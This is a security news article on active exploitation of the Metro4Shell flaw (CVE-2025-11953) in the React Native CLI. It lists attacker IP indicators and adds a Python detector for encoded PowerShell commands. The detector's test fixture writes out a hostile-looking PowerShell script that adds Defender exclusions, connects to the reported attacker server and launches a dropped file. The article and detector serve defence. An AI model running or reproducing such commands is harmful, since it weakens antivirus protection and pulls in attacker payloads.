Security researchers have observed active exploitation of a critical vulnerability affecting the Metro Development Server built into the widely used @react-native-community/cli npm package. According to cybersecurity firm VulnCheck, exploitation of CVE‑2025‑11953, also known as Metro4Shell, was first detected on December 21, 2025. The flaw carries a CVSS score of 9.8 and enables unauthenticated remote attackers to execute arbitrary operating system commands on the affected host. Technical details of the vulnerability were initially published by JFrog in November 2025.
Despite more than a month of confirmed in‑the‑wild exploitation, VulnCheck noted that the activity has not received widespread public attention.
In attacks observed through VulnCheck’s honeypot infrastructure, threat actors leveraged the vulnerability to deploy a Base64‑encoded PowerShell script. Once decoded, the script performs multiple malicious actions, including adding Microsoft Defender Antivirus exclusions for both the current working directory and the system’s temporary directory (C:\Users\<Username>\AppData\Local\Temp).
The script also opens a raw TCP connection to an attacker‑controlled endpoint at 8.218.43[.]248:60124, requests additional data, writes the received payload to a file within the temporary directory, and executes it. The downloaded executable is written in Rust and incorporates anti‑analysis mechanisms designed to complicate static inspection and detection.
The malicious activity has been traced back to the following IP addresses:
- 5.109.182[.]231
- 223.6.249[.]141
- 134.209.69[.]155
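Given the behaviour described above, a defender's most useful artefact is the Base64-encoded PowerShell command line itself, as it appears in Windows process-creation telemetry (Sysmon Event ID 1 or Security Event 4688). The following is an added example, written for this page rather than taken from VulnCheck's or JFrog's reporting: it decodes a `powershell -EncodedCommand` argument (Base64 over UTF-16LE), flags the behaviours the article attributes to the script (Defender exclusions, a raw TCP socket, a write to the temp directory, execution of the dropped file) and matches the IP indicators listed on this page. The behavioural regexes are my own heuristics, not signatures published by either firm; the sample command line and access-log lines are constructed test fixtures that mimic the reported activity, and the log format is assumed to be Apache/NGINX combined style.

```python
import base64
import re

# Indicators taken from the VulnCheck reporting summarised on this page
# (written in plain dotted form; the page defangs them as 8.218.43[.]248 etc.).
KNOWN_C2 = {"8.218.43.248"}                                      # payload server, port 60124
KNOWN_SOURCES = {"5.109.182.231", "223.6.249.141", "134.209.69.155"}  # exploitation sources

# Behavioural indicators (heuristic, my own): (label, regex over the decoded script).
BEHAVIOURS = [
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("raw_tcp_socket", re.compile(r"System\.Net\.Sockets\.TcpClient", re.I)),
    ("temp_dir_write", re.compile(r"\$env:TEMP|AppData\\Local\\Temp", re.I)),
    ("executes_dropped_file", re.compile(r"Start-Process|Invoke-Item|Invoke-Expression", re.I)),
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Combined-format access log: client IP, ident, user, [timestamp], "request", status.
ACCESS_LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "([^"]*)" (\d{3})')


def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand blob. PowerShell expects Base64 of UTF-16LE text;
    fall back to UTF-8 for blobs that were just base64'd script bytes."""
    raw = base64.b64decode(b64)
    # ASCII text in UTF-16LE has a NUL in every odd byte; UTF-8 text has none.
    looks_utf16 = len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
    return raw.decode("utf-16-le" if looks_utf16 else "utf-8", errors="replace")


def analyze_script(text: str) -> dict:
    """Match behavioural indicators and page IOCs against decoded script text."""
    behaviours = [label for label, rx in BEHAVIOURS if rx.search(text)]
    ips = sorted(set(IPV4.findall(text)))
    known_c2 = [ip for ip in ips if ip in KNOWN_C2]
    # One point per behaviour, two per known C2 address (arbitrary weighting).
    score = len(behaviours) + 2 * len(known_c2)
    return {"behaviours": behaviours, "ips": ips, "known_c2": known_c2, "score": score}


def analyze_command_line(cmdline: str) -> dict:
    """Analyse a process command line; decode -EncodedCommand first if present."""
    m = ENCODED_ARG.search(cmdline)
    if m:
        result = analyze_script(decode_encoded_command(m.group(1)))
        result["encoded"] = True
    else:
        result = analyze_script(cmdline)
        result["encoded"] = False
    return result


def flag_known_sources(log_lines) -> list:
    """Return (client_ip, request) for access-log lines from known exploitation sources."""
    hits = []
    for line in log_lines:
        m = ACCESS_LOG.match(line)
        if m and m.group(1) in KNOWN_SOURCES:
            hits.append((m.group(1), m.group(2)))
    return hits


# Constructed fixture mimicking the reported script; not the real payload.
SAMPLE_SCRIPT = (
    "Add-MpPreference -ExclusionPath (Get-Location).Path\n"
    "Add-MpPreference -ExclusionPath $env:TEMP\n"
    "$c = New-Object System.Net.Sockets.TcpClient('8.218.43.248', 60124)\n"
    "$out = Join-Path $env:TEMP 'payload.exe'\n"
    "Start-Process $out\n"
)
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# Constructed access-log lines (second IP is from the 198.51.100.0/24 documentation range).
SAMPLE_LOG_LINES = [
    '134.209.69.155 - - [22/Dec/2025:03:14:07 +0000] "GET / HTTP/1.1" 404 0',
    '198.51.100.7 - - [22/Dec/2025:03:15:42 +0000] "GET /status HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    print(analyze_command_line(SAMPLE_CMDLINE))
    print(flag_known_sources(SAMPLE_LOG_LINES))
```

The UTF-16LE check matters in practice: decoding a UTF-16LE blob as UTF-8 does not raise, it just yields NUL-interleaved text that none of the regexes will match, so a detector that skips the heuristic silently misses exactly the encoded commands it was written for.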
VulnCheck assessed the campaign as deliberate and operational, rather than exploratory testing. The firm noted that the payloads remained consistent over several weeks, indicating sustained exploitation rather than proof‑of‑concept activity or vulnerability scanning. “CVE‑2025‑11953 is not noteworthy simply because it exists,” VulnCheck stated. “It is notable because it reinforces a recurring lesson for defenders: development infrastructure becomes production infrastructure the moment it is exposed to the internet—regardless of the original intent.”